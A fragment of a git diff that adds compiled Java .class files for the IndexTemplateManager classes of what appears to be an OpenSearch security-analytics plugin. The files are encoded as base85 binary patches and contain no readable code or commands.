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 Dd0;t- literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager$1.class b/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager$1.class new file mode 100644 index 0000000000000000000000000000000000000000..4771fa4b7f436589c0807d9b93e3a413e8bd4884 GIT binary patch literal 1751 zcmbtUTTc@~7(KI;mR_`#n}Bz%+6%JcHKc?{8i*tX6CphKHf$$lal5nGog(;4{2L~s z(FfzRzr{o!^ws#ywx+nH#>OUd>C880&UfZ~`}yaGj{qLxK>`NDlJpy<^n@D-?pwQN zAgq>et3&Q`=TO;JU^cnu3Ey0E>*8QbG(Cqau}<3!;pgWQh%w~$_&zrs?l#OPJA1-X z3B(zS5oAmH!sM2+rE4ySL(LA9aD~qhSG#tQzfE*%ky8WlsW6Q0b0^=vr3+t>FkJO_}=UIc6 z=Sg3YW$0mjdgbS?eBp?CL)3qtt`xV^7{>Vwrg4E`qEL&Phawop`3YwkD$z^^xR@a+ z-BoToEuV6jI)3rWfh9a`%nrM28C=E{21bDs#|U=g61d5*5b^52lS$Fr7PSO3B<-eb z`IcC<^)pVNRAzHpBBH-(H(ahl`Y(^MYS&zkH2vMS_#Y}Rkr}cpuI0$Ub{p$L?aF!r zRJn^0F$VHj26u3mVXWl^!dHK2!0@WaZkA&USDDpts630NV>zwRe@&ryohxouWz&;^ zE{s2*E5}6KR6gZ1fQX?@Gixq=zp4%o0zri~vLOQXSO$vhL#0Y>7)CCqs~O0R>RP5x zZ;Vo~DH_QxnCZY& zDcYd5bm%1jMxM`v6|;1^iBcKl%XXaUCqT ztgE~OSnM!Nmdc-S<1GqZe(e-l2&I!4Mu~a@Wz2@-EzHpvgNb?EqnR!rErkBvr)I$X E1po}~*8l(j literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager$2.class b/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager$2.class new file mode 100644 index 0000000000000000000000000000000000000000..fa89ae6ab90797727e364a5b7c9edc6d8f176075 GIT binary patch literal 1749 zcmbtUYflqF6g^W4rR`!X^7gG&`#@Il6;eVp4MdWHi6wj=wv)2Bo!#utBKR}>CnloN z55~{_DC3=NNt-P-Ha3~g?99Dq&b{~C`Sttz4*)OlJcR_qhU>RX*Ap@j+_w(RKv3Mu z+G>NrDaQRqV-xrO%dMq-hGflciZmE<22z;RtIGz`$Yd~vD+aQdVHhiF(_Gz_VmE9b z2!D?sID+D?yB2r$xo_+5?q*V_mEmQa$Vg!nRw*YLSH2a2=aNjQNCSE4mNf`H&-E2a zh6?LbmETGCy(5|}(LDFAmiDt4$29|sxXv(JtjEPe77R1|0$+w|JdzPEW=Okoi`!1< zQw$6J7jK?e!qdX+vb$^G7H%^zGMw!r*t1LF0mE8MtN%_WL$xjG6f99{8*b=ZV$0TL zT)e2wR&(ZXh+o)wcd0S==Bo9dpP^4yBvNBr((6@ocn}C`v&mf%sMl_wNIcZ2G{%w0=XEaw`DxwB^zbHW zWMRfiMqOAmG>3@O@!IGGxwRR#?%wvIO5(}2PFg3DH z&|bFu8TraLTuq<{kLA8Zj#d>cNAp9h(42&c$9PIB-8?!G`uB`R0_Gn_ Clju?a literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager$3.class b/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager$3.class new file mode 100644 index 0000000000000000000000000000000000000000..38fcf796fbacdcdcefac58dae0fb9484da2421f1 GIT binary patch literal 1713 zcmbtUTTc@~6#k|ZO54>|ycZ%S@G7*hF z7@z%7#xvWJHVZX2Hkr=s%sJnD=bZ1%uixK)0C<7tDI^%yRM51QFJvfq;2hYYaN2>Z zPq^gXiFTdPZgJlifxRgk;&@lIe2;6fMaNAM6qZv+GUN~W5w|@qoA#UiL*eKY#u!R5 zWJd+U=8kriv|mM2-3_&nB48NP2X0t+M0Dyguc7!<877XnSLoc*gRjI<2Xi5au~k>P zdX2#=#{Gt46Zihht))GNWKA_h8VorLDU6%d6$@!(G8n;C3t3Duj1-M&uI@^)-EQrR zV3+TEg5s_#hkJWGaLspjGilPw@G?$hs4xo4l#`5-Z$;=Uk_i>*Twc0m4cor20!@;k z!Uk03_fmcEM58GhXWrG)UKXRcZeb2L7^aH#xOm8dVUl0q%TSF+GQ`CUX(czf>$L-l zVYdI`^a*vDLH3txM+bCw^<6v+$8*Wau0>O|lcBbDJ$sA$L!>7X zptULKWvY2R3KSqXN3z(+0aUxU9V3uYQ0_M9gHL_07Ubg%h`N}t3OP~jl zF-NR~3@b-4(;d?;jA3&Vw+M(CK@R}DdmeC!0PO*Q1>6VAzcT&X1uS(LrpuL|Sonfs pk6#obnVAqx5ThtZs|psQ`5~5QPQu1xJf)Rs43h}+dqyJx`w!H6+RFd{ literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager$4.class b/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager$4.class new file mode 100644 index 0000000000000000000000000000000000000000..f18b4e1ad85389f3ca332d50dc1f24df9699f313 GIT binary patch literal 1786 zcmcIlYflqF6g|@xN*~&afPgR5s(m1fh!0XiG!-IA!9<{me$Xu2Nm<;^Y<9N@f5U%b zA{zW){Opf1-q~G3U0V}EY_dDEGxwf*?!9NGKYxAu4&X5sl87-ZNvEYrn+uogjU+9o>7u2*+}`De zm&71LDS~WBhikgwnNn!a{Go2T9v9qU81!~bw=hd|>JhI~@u@Nl@99<{h;jm7iK6!B zLJ)(CrZBxF2CEqLI~|*-_dlYR8Vre=Z1NNsa#B~)zBSNeTRz)RaS~yZI~^gdmV@D8olinqjW-1xE7$sG5Ct91TxX<0M950 zhL2rAf)iYg_Nc#h7ym=CmPm5BWnoy-HAQQUdpok3!~=%Kvs@2ZJj5f0siu6+E$;Cx z(Q$dRCflTIF1+K*jU+Sk*U9gnzpuCKs-TOkX6dfW$$w~_yWR`wdYGbq#OWD8ET31$ z8psc;Lrr&Zf}RYrw0n+b3y6^=kSkXXalSl#h}lVo+7<}qCH;kIZNqwh@lGxF>RS7T66aUUwJw%BW=*&82jEHDk>6ssxRAlRGa z5rk4Jw`heaY0_IUu62i~9N|t7B48VYcuOJP^$Af#2`v9i9pn(O6auEol^-a7!E_{f lGE>Q`v<5Ka&$KY8Ahy literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager$5.class b/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager$5.class new file mode 100644 index 0000000000000000000000000000000000000000..133ca0a79b4480abf954f83d37aab26cd8c3bcb7 GIT binary patch literal 1890 zcmcIkYflqF6g|@x3hg2l3yAMWRcL|52fkVx2|^?(mgG zhY4u(gYmOJ%6MmYk-9+>V%%hR?#|q~=iEDI?)M*Gz5=*~ds(Cy>e6qS(i3hVxNohS zfw0=Xt+u(#oo!`Xfw{>&Px$77+Z0_U*T(xpwcy@#hq2| z+xkDA%;=M0xSwQrsQgOPRIHqIAB(_~q%?++(T+T3rQ?ulNElVktasUNxm>k<@>@OF zua=|}>ndn_p7a%ImXzg_%$~XOg(I3R(cHtX)(Iq!E?h8h8W*WRF+_)cBN~3pmeLG196Sp0RW=E4~bP85?iH_8kg*rr0LJ=AZ zE;YzmhX;Wm9ri4VKs}U!!Z|vmG`(F&7Yh2;1BC&7=fjb1JoWety?r=BUj1a%kqT#u z<;pG! dXkCx}2A literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager.class b/bin/main/org/opensearch/securityanalytics/mapper/IndexTemplateManager.class new file mode 100644 index 0000000000000000000000000000000000000000..1f2ca69d6c1dd84a29e81ef4f57512789019bb4c GIT binary patch literal 22712 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

OKkNab}KgQtwb(p`f#82fR7 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 